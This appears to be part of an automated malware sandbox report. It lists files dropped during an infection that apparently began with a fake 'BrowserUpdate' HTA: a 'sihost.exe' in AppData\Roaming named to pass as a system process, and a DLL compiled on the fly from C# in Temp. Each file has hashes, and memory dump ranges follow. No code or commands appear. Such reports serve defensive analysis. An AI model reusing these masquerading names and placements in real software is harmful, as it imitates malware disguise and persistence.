4d3fcc9cb191e3dd1bd63ebc74375d8d8f4fab43ed287cadb4c501f19dc372a99a0e18a5181e9c86428ccb0ddcf156a3a7bc3d3e7ff2ffda738134a70a9cb1a1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8f926fb088953de70c257349231bad35

SHA1
b2af3618cfa98a93b33b77391f900a041afd95d5

SHA256
0419544cf0e6b7b97ca406ddcec4511e40fa966267a43e3100df64622f7cfa9a

SHA512
451380760acc251154c176e3afab99f00963d6e216bd2c89655f54abce6797aa9456312f7a9c55cf0f283b924071ca23faf4b0f24475b7f4f729231c5a63ed1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\BrowserUpdate[1].hta

Filesize
12KB

MD5
acf4185c4306c40c2638122ea7464d4a

SHA1
fe5cbe2a9c3e83e4c1af9e312318a332c1ea2a88

SHA256
a42913382f1d2812268a7072d7272fc19441386b474813c1bff6930bd5984c1b

SHA512
7f46adfcb94ff24e594e482ca4eba6e768365d9dfc2555d40f3206f914f5a2897541817b408c29a0e1cda575111580cb32901fe501ba21add7c0906bfd016879

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\UvdlEoSKo[1].htm

Filesize
168B

MD5
d57e3a550060f85d44a175139ea23021

SHA1
2c5cb3428a322c9709a34d04dd86fe7628f8f0a6

SHA256
43edf068d34276e8ade4113d4d7207de19fc98a2ae1c07298e593edae2a8774c

SHA512
0364fe6a010fce7a3f4a6344c84468c64b20fd131f3160fc649db78f1075ba52d8a1c4496e50dbe27c357e01ee52e94cdcda8f7927cba28d5f2f45b9da690063

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9B0A.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD0D7.tmp

Filesize
1KB

MD5
a3b81fc35efb6b6b7fcfbb02a0b99122

SHA1
831699c93d2c52feea7941988515d2b5869aeabf

SHA256
bbe43fbd97f3960655d5e9aa0ef1a3109cd650799aac53a2753317c4692bc1df

SHA512
bdb1f4dd74c67494291159d9dec095924d3abb5f3276e02ef94e5f151a00585ad251e644b07d820a48b4decbdb9483eabd22e9616e474f6ef2705c9992ea87da

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar9CC6.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\wde-qtmf.dll

Filesize
3KB

MD5
af17954acf9850ae3b97089572ca0fc5

SHA1
d00c01be9a61d0b8eb8dc5c6d4309d13fa526ae9

SHA256
4625b26410c903f96969d0caff72b99d0aad090c759d2d7d627838c2070643fa

SHA512
c4ccd9e9fd9f300bd923051d9a1989cf9f8bf3772dfc0620dc3e5a32fb183aae34dacfe8071748723fab349e678b9303a50d81beeafdce33d6e301474ab58d98

Download Submit
C:\Users\Admin\AppData\Local\Temp\wde-qtmf.pdb

Filesize
7KB

MD5
30105c16142c36715f6e4c0cf03a23e8

SHA1
9643722f83574fa27e624507b2e6be95cebf198a

SHA256
0fc24e3bb9300ca7b7be04c3395aa6f1313425ea51d008b2211c796ebffb033e

SHA512
0029683dd9823faae018e2621c3358e0d096b76a5390dbd544371301a06722cebfae73c1cceacccc2b7549beefabf3fa9f7dbcc911bdb0a7e7a1102fb8708b11

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4YPOK9N6.txt

Filesize
70B

MD5
270822daaef19f9dfedc3a66483072ea

SHA1
34af36841a47c460321e9d1a922c079bf2b5a861

SHA256
5c73408d13dd5a834327887ce99f2acef11ed9051d2acdeb3363bd9d755a52e5

SHA512
6fe2a3f6e90fb6f6b899966859dd8031541918c14da9f5fe2c886e9453b464b6b65da26f79cddef2ad6f4ed4cad51a2a2c6ac0eac91fafaaa366e892d98f4b1a

Download Submit
C:\Users\Admin\AppData\Roaming\sihost.exe

Filesize
6KB

MD5
b3b47b6ee61c3a64850d82d3debcf871

SHA1
3962069f0c5ef9781921009b493a1b9d82152a62

SHA256
4d3b36af0c5df29e21661945d4ada479187a119c35ceaba5c7d1cdd0ccb198c5

SHA512
3fd270aaeb87cfe1614ec954dd7f0168d41b5c78d3663a2aaa3abe8181d61b560c60c268e41edbea95b2704975e6abee86b29c7c553cc22a220f083d66691ed4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCD0D6.tmp

Filesize
652B

MD5
e5eae01063b70611259bbec44f7e46ea

SHA1
612037e6ccda2534bd8534b67f04e15025055aca

SHA256
76b9f46984d504d630b201885392b7c8e410ae6d1de874a36ee5395078641cc4

SHA512
dd19eb7aaa607f01346794f5ff0251cd03f7b7aa1167337fb455a179fe9b0f2cddb8dd3586d981204d28179597c2b365c9446d5fb5b8f083247817dead5c9532

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wde-qtmf.0.cs

Filesize
456B

MD5
b482306a1ee20f92189f3cbcd699aba3

SHA1
42d499137c52fa5bed274ae4942b089dbf025119

SHA256
ca429dae59619b584c51f3eb7f070e425308c373ebe32222679ead6b9ca4f706

SHA512
47f9add1109662cd59843fed68a72edbbc13da41fd1757f8fbd5ea46aa70eb43b87865d903505a50b1b2419b41eb40878cce4eeb9ce6c2587a4e028e93e527c5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wde-qtmf.cmdline

Filesize
309B

MD5
8c4dc40595090a90147f17d16b66b640

SHA1
006b172128a07bc8446cfa37062c2ef6b0c8b71c

SHA256
d7ba08c796bbcdc900c38f56fe2a47accdb69b38362365d5bc7ea41c8c7cd536

SHA512
8ab468ef703f64d3b6d8813136f142aabaa46a7b7db7b0dd175725d7ce257c1366f9948f5b12ab3c111924acbeed41ef10f4e401ec2f1ff1504ce145c2e53c2d

Download Submit
memory/1284-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1284-1-0x000000007229D000-0x00000000722A8000-memory.dmp

Filesize
44KB

Download
memory/1284-100-0x0000000002430000-0x0000000002432000-memory.dmp

Filesize
8KB

Download
memory/1284-168-0x000000007229D000-0x00000000722A8000-memory.dmp

Filesize
44KB

Download
memory/1284-170-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1284-173-0x000000007229D000-0x00000000722A8000-memory.dmp

Filesize
44KB

Download
memory/1888-167-0x0000000000CE0000-0x0000000000CE8000-memory.dmp

Filesize
32KB

Download
memory/1892-99-0x00000000021A0000-0x00000000021A2000-memory.dmp

Filesize
8KB

Download